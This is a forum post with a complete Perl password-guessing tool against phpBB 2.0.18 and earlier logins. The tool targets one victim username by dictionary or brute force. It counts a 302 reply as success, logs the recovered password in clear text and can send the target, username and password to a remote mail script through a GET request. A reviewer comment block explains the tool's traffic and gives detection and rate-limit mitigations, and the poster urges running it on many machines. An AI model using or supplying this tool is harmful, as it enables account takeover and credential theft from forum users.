Hi all, i have just released an update of my tool Code:
#!/usr/bin/perl
####################################################################################################################
# Title: PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool
# Type: Bruteforce / Dictionary attack
# New demo: [url]http://rapidshare.de/files/13694254/phpbbbtr.avi.html[/url] (1.06 mb)
# Php Email Script data: <? mail($destinataire, $objet, $contenu, "From: $expediteur\r\nReply-To: $expediteur"); ?>
# Note: Host the php script and replace the line 34 [] Php script for the email option because win32 don't support Mail::Mailer
# Changelog: Bruteforce option | Starting length | Email option | More fast | Die error disabled |
# Credits: DarkFig
# Greetz: Romano [] Pgeo [] Fred [] CrackJerem [] Volcom [] Ddxs [] The truth [] And all man who like me =)
# Web: [url]http://disarm.free.fr/bo_hard/[/url] (english language accepted..we are french sorry^^)
####################################################################################################################
#
# Reviewer summary (what the listing below does, read from the code itself):
#   * Online password guessing against <path>login.php for ONE username:
#     one candidate password per POST, either from a word list (-dict) or
#     from an incrementing string (-btr).
#   * A guess is treated as correct when the first 15 bytes of the reply
#     match "HTTP/<anything> 302"; any other reply counts as a miss.
#   * Traffic traits visible in phpbb(): a fresh TCP connection per attempt;
#     the request names only Host, Content-Type and Content-Length (no
#     User-Agent or Cookie appears in the string); the form body always ends
#     in "&redirect=&login=Connexion"; username and password are concatenated
#     into the body without URL-encoding.
#   * Detection / mitigation: bursts of failed POSTs to login.php for a single
#     account, and the fixed body suffix above, are usable log and IDS
#     signals; failed-login limits per account and per source address blunt
#     this class of tool.
#   * Handling of a recovered password: written in clear text to the <log>
#     file and, when the mail option is on, placed in the query string of a
#     GET to $mailsite -- so it can also surface in that host's access logs.
#
use IO::Socket;
use LWP::Simple;

#_Usage_
# Fewer than six arguments: print the usage banner and stop.
if(@ARGV < 6){
print q( +---------------------------------------------------------------------------------------------------+ | PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool [~_~] by DarkFig | +---------------------------------------------------------------------------------------------------+ | Usage: phpbbbtr.pl <host> <path> <port> <attack> <char> <length> <victim> <log> <email> | +---------------------------------------------------------------------------------------------------+ | <host> | The host where the php flaw is installed | [Ex: victim.com] | | <path> | Path of the php flaw | [Ex: /vuln/] | | <port> | Port of the host | [Ex: 80] | | <attack> | Bruteforce[-btr] or Dictionary[-dict] | [Ex: -dict] | | <char> | Bruteforce[upperalpha, loweralpha, numeric] or Dictionary file | [Ex: dico.txt] | | <length> | For the bruteforce option, define a starting 
length | [Ex: 7] | | <victim> | The victim's username | [Ex: L4m3r] | | <log> | [Optional] File where you want to save the password | [Ex: results.txt] | | <email> | [Optional] Email where the password will be sent | [Ex: [email][email protected][/email]] | +---------------------------------------------------------------------------------------------------+ );exit;}

#_Configuration_
# All state below is held in package globals shared by every sub.
$mailsite = "http://yoursite.com/mailme.php"; #Replace this value by the Url of the Php email script
$shipper = "xploitdarkfigbot%40gmail.com"; #Default shipper email, [email][email protected][/email] really exist => It work ;)
$host = $ARGV[0];
$path = $ARGV[1];
$port = $ARGV[2];
$attack = $ARGV[3];
$content = $ARGV[4];
# Positional arguments shift by one between modes:
#   -btr : [5]=starting length, [6]=username, [7]=log file; mail is switched
#          on by $ARGV[9] while the address is read from $ARGV[8].
#   else : [5]=username, [6]=log file, [7]=email (its presence enables mail).
if($attack eq "-btr"){$length = $ARGV[5];$username = $ARGV[6];$results = $ARGV[7];if(!$ARGV[9]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[8];}}
else {$username = $ARGV[5];$results = $ARGV[6];if(!$ARGV[7]){$mailoption = 0;} else {$mailoption = 1;$email = $ARGV[7];}}
$nligne = "-1"; # word-list index before the first increment; replaced by a seed character in -btr mode
$postit = "$path"."login.php"; # request path used in every POST
$full = "http://"."$host"."$path";&hello;

#_Hello_
# Entry point: load the word list (dictionary mode), print the run banner,
# pick the seed character for brute-force mode, then hand over to the
# matching candidate generator.
sub hello() {
    # Word list is read fully into @dico, one entry per line, newlines removed.
    if($attack eq "-dict"){open dictionary, "<$content" || print " [-]Can't open the file.";chomp(@dico = <dictionary>);}
    print "\n +--------------------------------------------------------+ PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool +--------------------------------------------------------+ [+] Attack: ";if($attack eq "-btr"){print "Bruteforce";}if($attack eq "-dict"){print "Dictionary";};print" [+] Target: $full [+] Port: $port [+] Username: $username +--------------------------------------------------------+";
    # <char> doubles as the charset name; it selects the first character of the sequence.
    if($content eq "upperalpha"){$nligne = "A";}
    if($content eq "loweralpha"){$nligne = "a";}
    if($content eq "numeric"){$nligne = "0";}
    if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&generate;}}

#_Bruteforce_
# First brute-force candidate: the seed character repeated $length times.
sub generate() {
    $nligne x= $length;
    $passwordz = $nligne;
    print "\n [~]Trying the password: $passwordz";
    &phpbb;}

# Next brute-force candidate: relies on Perl's ++ applied to the string in $nligne.
sub btrfr() {
    $nligne++;
    $passwordz = 
    $nligne;
    print "\n [~]Trying the password: $passwordz";
    &phpbb;}

#_Dictionary_
# Next word-list candidate; an empty entry is treated as the end of the list
# and routes to the result writer.
sub dictio() {
    $nligne++;
    $passwordz = $dico[$nligne];
    if($passwordz eq ""){&successfailed;}
    print "\n [~]Trying the password: $passwordz";
    &phpbb;}

#_Socket_
# Sends one login attempt and classifies the reply.
# Reads globals $username, $passwordz, $host, $port, $postit; sets $OK on success.
sub phpbb(){
    while ($OK ne 1){
        $data = "username="."$username"."&password="."$passwordz"."&redirect=&login=Connexion";
        # Reuses the global $length (the -btr starting length) as the Content-Length value.
        $length = length $data;
        my $send = IO::Socket::INET->new(Proto => "tcp",PeerAddr => "$host", PeerPort => "$port") || print "\n [-]Can't connect to the host.";
        print $send "POST $postit HTTP/1.1 Host: $host Content-Type: application/x-www-form-urlencoded Content-Length: $length $data";
        # Only the first 15 bytes are read -- enough to cover the status line prefix.
        read $send, $answer, 15;
        close($send);
        # A 302 redirect is the only success signal; the response body is never inspected.
        if($answer =~ /HTTP\/(.*?) 302/){$OK = 1;}
        # decision() calls back into dictio()/btrfr(), which call phpbb() again,
        # so successive attempts nest as mutual recursion inside this loop.
        &decision;}}

#_Decision_
# Miss: request the next candidate for the active mode. Hit: write the results.
sub decision(){if($OK ne 1){if($attack eq "-dict"){&dictio;}if($attack eq "-btr"){&btrfr;}} else {&successfailed;}}

#_Success/Failed_
# Prints the outcome, writes the report file, optionally relays the result
# through the remote mail script, then exits the process.
sub successfailed(){
    if($OK eq 1){print "\n [+]User: $username\n [+]Password: $passwordz";}
    if($OK eq 0){print "\n [-]User: $username\n [-]Password: Not found";}
    # Report file is opened for overwrite; the password is stored in clear text.
    open FILE, ">$results" || print "\n [-]Can't write the file.";
    print FILE " +--------------------------------------------------------+ PhpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool +--------------------------------------------------------+ [+] Target: $full [+] Port: $port [+] Username: $username [+] Password: ";
    if($OK eq 1){print FILE "$passwordz";}
    if($OK eq 0){print FILE "Not found...";$passwordz = "Not found";}
    print FILE "\n+--------------------------------------------------------+\n";
    close FILE;
    close dictionary;
    #_EmailOption_
    # Target, port, username and password travel as GET query parameters to
    # $mailsite; the PHP mail() one-liner in the header is the receiving side.
    if($mailoption eq 1){
        $fullmailurl = "$mailsite"."?expediteur="."$shipper"."&destinataire="."$email"."&objet="."[Xploit]Results for $host"."&contenu="."Target: $full"."%0D%0A"."Port: $port"."%0D%0A"."Username: $username"."%0D%0A"."Password: $passwordz";
        $mailpg = get($fullmailurl) || print "\n [-]Can't connect to the email script 
hoster.\n+--------------------------------------------------------+\n\n" and exit;
        print "\n [+]Email sent, check your mail !\n+--------------------------------------------------------+\n\n";}
    else {print "\n+--------------------------------------------------------+\n";}exit;}
# milw0rm.com [2006-02-20]
Yeah, the speed is not very high but if you execute it on a lot of box...you can have some success ++